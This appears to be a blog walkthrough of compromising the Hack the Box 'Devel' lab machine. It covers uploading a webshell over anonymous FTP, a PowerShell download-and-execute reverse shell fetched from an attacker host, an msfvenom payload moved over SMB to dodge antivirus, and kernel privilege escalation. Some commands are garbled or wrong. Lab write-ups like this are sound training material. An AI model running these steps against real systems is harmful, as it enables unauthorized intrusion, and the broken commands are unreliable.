If you don’t already have a Hack the Box subscription definitely get one. This is the hack the box Devel walkthrough another Windows box good for practicing Windows exploitation which is a difficult skill to develop but an essential one none the less.
htb Devel Initial Enumeration
An Nmap scan shows that there are two services running FTP and web which means either of these could be the way in.
Looking at the scan result I focus on the IIS version being 7.5 which means that the box is most likely a Windows server either 2008 or 2012 IIS is installed on these by default.
One of the first things I try is to see if the FTP service allows anonymous login and it does! This is pretty good damn news it means I can upload a Webshell I hope.
A vital FTP command to learn, lcd! Here I am using lcd /kali/devel to move the current directory to the directory where I have my Webshell I want uploaded.
Notice that after doing so the put file command is working and now I have successfully placed the Webshell into the web root inetserv folder.
htb Devel Web Exploitation
After uploading the aspx shell I can now run commands on the box! Dir is working, but let us look at getting a shell back to my Kali box. How does that work?
Well to do that I can use Nishang’s Invoke-PowerTcp.ps1 and after making a single edit to the script it will make a connection back to my Kali instance.
In the shell I have on the box in the web root now I am going to put this command to get a shell back to a new nectar listener.
Powershell iex(new-object net.webclient).downloadString(‘http://10.10.10.1:8000/PowerShellTcp.ps1’)
Make sure to start a nectat listener in Kali.
nc -lvp 4444
htb Devel Privilege Escalation
For this I am going to use Sherlock.ps1 to check for all existing vulnerabilities. This box is interesting it has a vulnerability MS10-15 and unfortunately that means I can’t not Use Metasploit for the exploit (sad face).
Now to make a new Meterpreter payload and upload it too to the box.
msfvenom -p windows/exploit/reverse_tcp -LHOST 10.10.14.30 LPORT 4444
Why tho? I tried using PowerShell downloadString to download the exploit but it must be getting grabbed by Defender or something although I doubt Defender is even enabled since we can run a lot that it would block.
To bypass any possible AV I am instead going to use Impacket’s smbserver.py script to start an SMB server to host it so that I can copy it over to the Windows box.
smbserver.py kali /tmp
Then the copy command is necessary to get the file over.
copy //10.10.10.14/kali.myshell.exe
Before running that command ./myshell.exe to start the shell connection I need to start a msf multi handler since it is a staged payload meaning it can’t be caught with a normal nectat listener.
Once that is done I can use the Metasploit exploit windows/local/ms10_015_kitrap0d and use it to get a root level shell on the Devel box!
And that is it for the hack the box Devel walkthrough!
Want to learn more ethical hacking? I highly recommend buying my book made for beginners to Pentesting Become An Ethical Hacker. Check the price on Amazon.
